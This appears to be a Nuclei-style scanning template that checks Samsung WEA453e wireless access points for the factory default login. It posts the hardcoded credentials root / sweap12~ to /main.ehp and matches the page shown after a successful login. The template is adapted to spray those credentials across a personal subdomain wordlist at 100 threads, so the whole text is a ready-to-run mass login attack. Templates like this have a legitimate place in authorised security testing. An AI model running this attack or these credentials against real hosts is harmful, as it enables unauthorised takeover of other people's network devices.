id: samsung-wlan-default-login

info:
  name: Samsung Wlan AP (WEA453e) Default Login
  author: pikpikcu
  severity: high
  reference: https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/
  tags: samsung,default-login

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        POST /main.ehp HTTP/1.1
        Host: {{Subdomains}}
        Content-Type: application/x-www-form-urlencoded

        httpd;General;lang=en&login_id=root&login_pw=sweap12~
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "document.formParent2.changepasswd1.value"
          - "passwd_change.ehp"
        part: body
      - type: status
        status:
          - 200
